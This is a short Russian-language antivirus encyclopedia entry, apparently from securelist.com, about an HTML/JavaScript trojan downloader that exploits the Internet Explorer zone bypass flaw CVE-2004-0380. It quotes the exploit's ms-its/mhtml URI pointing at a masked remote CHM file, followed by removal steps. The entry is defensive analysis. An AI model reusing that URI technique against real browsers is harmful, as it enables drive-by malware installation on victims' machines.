Технические детали
Троянская программа, которая без ведома пользователя скачивает на компьютер другие программы. Представляет собой HTML страницу, которая содержит в своем коде зашифрованный сценарий Java Script. Имеет размер 1657 байт.
Деструктивная активность
Деструктивная активность После открытия зараженной страницы троянец выполняет перенаправление на вэб ресурс, который располагается по ссылке:
http://206.***.149/tbd1.php?wm=489
Далее, при помощи сценариев Java Script, происходит расшифровка и выполнение вредоносного скрипта на текущей странице. Используя "zone bypass" уязвимость в Internet Explorer (CVE-2004-0380), (MS04-013), троянец при помощи специально сформированного идентификатора ресурса (URI):
ms-its:mhtml:file://c://explorer.mht!
http://downlo***ution.net/rundlg32.chm::/1.htm
пытается загрузить вредоносный документ "1.htm",
который располагается в "chm" файле по ссылке:
http://downlo***ution.net/rundlg32.chm
На момент создания описания ссылки не работали.
Рекомендации по удалению
Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для её удаления необходимо выполнить следующие действия:
- Удалить оригинальный файл троянца (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).
- Очистить каталог Temporary Internet Files.
- Установить обновления:
http://www.microsoft.com/technet/security/bulletin/MS04-013.mspx
- Произвести полную проверку компьютера Антивирусом Касперского с обновленными антивирусными базами (скачать пробную версию).
Источник: securelist.com.
|